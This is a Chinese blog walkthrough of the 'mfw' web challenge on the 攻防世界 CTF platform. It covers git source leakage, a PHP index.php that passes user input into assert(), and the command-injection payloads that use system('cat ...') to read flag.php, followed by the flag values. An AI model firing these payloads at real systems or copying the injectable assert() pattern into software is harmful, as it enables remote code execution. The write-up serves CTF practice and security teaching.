攻防世界-mfw-(详细操作)做题笔记

如有不对的地方,还请各位大佬指正,下面开始正式做题:

 进入题目以后可以点击三个网页,这三个网页其中有一个提示我们git、php、Bootstrap、看到git的时候就可以联想到git泄露了,具体的git泄露知识请看这里:WEB安全-常见源码泄露 | wh1te

在网页后面添加http://111.200.241.244:58896/.git


可见存在git漏洞的,这时候就可以利用python的githacker库下载泄漏的文件。下载的系统是kali。

 我们用kali打开下载后的文档,发现当中有一个叫做flag的文档,但是查看以后发现什么都没有,应该是需要经过游览器特定的转换才能够看到该文件

翻阅了所有的文档以后并没有发现值得分析的文件,除了开头下载的index.php 文件中包含有代码部分

查看代码前我们需要知道:

assert()函数其实是一个断言函数。

assert:

  这个函数在php语言中是用来判断一个表达式是否成立。返回true or false;

        assert ( mixed $assertion [, string $description ] ) : bool

  如果 assertion 是字符串,它将会被 assert() 当做 PHP 代码来执行。

strpos() 函数查找字符串在另一字符串中第一次出现的位置,如果没有找到则返回flase,

<?php

if (isset($_GET['page'])) {  //判断参数page是否为空
	$page = $_GET['page'];
} else {    //为空输出page=home
	$page = "home";
}

$file = "templates/" . $page . ".php";

// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");  //查找$file
中..第一次出现的位置,查找成功则返回true,失败则返回flase,
// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");

?>
<!DOCTYPE html>
<html>
	<head>
		<meta charset="utf-8">
		<meta http-equiv="X-UA-Compatible" content="IE=edge">
		<meta name="viewport" content="width=device-width, initial-scale=1">
		
		<title>My PHP Website</title>
		
		<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.3.7/css/bootstrap.min.css" />
	</head>
	<body>
		<nav class="navbar navbar-inverse navbar-fixed-top">
			<div class="container">
		    	<div class="navbar-header">
		    		<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar">
		            	<span class="sr-only">Toggle navigation</span>
		            	<span class="icon-bar"></span>
		            	<span class="icon-bar"></span>
		            	<span class="icon-bar"></span>
		          	</button>
		          	<a class="navbar-brand" href="#">Project name</a>
		        </div>
		        <div id="navbar" class="collapse navbar-collapse">
		          	<ul class="nav navbar-nav">
		            	<li <?php if ($page == "home") { ?>class="active"<?php } ?>><a href="?page=home">Home</a></li>
		            	<li <?php if ($page == "about") { ?>class="active"<?php } ?>><a href="?page=about">About</a></li>
		            	<li <?php if ($page == "contact") { ?>class="active"<?php } ?>><a href="?page=contact">Contact</a></li>
						<!--<li <?php if ($page == "flag") { ?>class="active"<?php } ?>><a href="?page=flag">My secrets</a></li> -->
		          	</ul>
		        </div>
		    </div>
		</nav>
		
		<div class="container" style="margin-top: 50px">
			<?php
				require_once $file;
			?>
			
		</div>
		
		<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/1.12.4/jquery.min.js" />
		<script src="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.3.7/js/bootstrap.min.js" />
	</body>
</html>

 这里的关键代码是

assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");

 由于文件并没有对输入的字符进行过滤,所以可以进行语句闭合修改语句原本的意思,构建的payload:   /?page=');//                                            #双斜杠 " // " 再php中表示注释

 由于之前git漏洞下载对文件,我们已经知道了flag位于/templates/flag.php路径下,所以payload的构建可以直接一步到位,不用再用system('ls+xxx')回显路径,最后的

payload:    /?page=').system('cat+./templates/flag.php');//            

             

 FLAG: cyberpeace{0efc24240f66f1b3558c82b442cff2fa}

### 关于攻防世界 MFW 平台及其活动 #### 攻防世界简介 攻防世界是一个专注于网络安全技术实践与学习的在线平台,旨在通过模拟真实环境中的漏洞利用和防御场景来提升用户的实战能力。该平台提供了多种难度级别的挑战题目,覆盖 Web 安全、逆向工程、密码学等多个领域。 #### MFW 活动背景 MFW攻防世界中的一项特定活动或挑战模块,主要围绕 Web 渗透测试展开。参与者需要通过对目标站点进行分析、挖掘潜在的安全漏洞并加以利用,从而完成指定的任务目标——通常是获取隐藏的 `flag` 值[^1]。 #### 技术细节解析 在已知的信息中提到,MFW 的某些关卡设计涉及到了 PHP 代码执行漏洞。例如,在某次活动中发现了一处注释掉但未被有效移除的敏感变量 `$FLAG`,其值为 `cyberpeace{d98815545c367222f2e6db4cd679fe18}`[^2]。这表明开发者可能遗留了调试信息或者配置错误,进而暴露了关键数据。 另外还提到了一种攻击手法:通过构造特殊形式的输入参数(即所谓的 **payload**),可以触发服务器端的断言函数 `assert()` 将传入的内容解释成合法PHP语句运行。具体实例包括调用系统命令显示文件内容的操作: ```php ?page=abc') or system("cat templates/flag.php");// ``` 上述方法成功实现了远程代码执行的效果,使得参赛者能够读取到存储有最终答案的位置[^4]。 #### 如何参与此类竞赛? 对于希望加入像攻防世界这样的 CTF (Capture The Flag) 类型比赛的新手来说,建议遵循以下几点准备策略: - 学习基础理论知识,比如常见的 web 应用程序缺陷分类以及对应的修复措施; - 练习实际操作技巧,多尝试解决不同类型的练习题以积累经验; - 加强编程技能训练,熟悉至少一门主流脚本语言以便快速编写工具辅助解题过程; 最后提醒各位爱好者注意遵守赛事规则,在授权范围内开展研究工作,共同维护良好的网络生态环境。
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值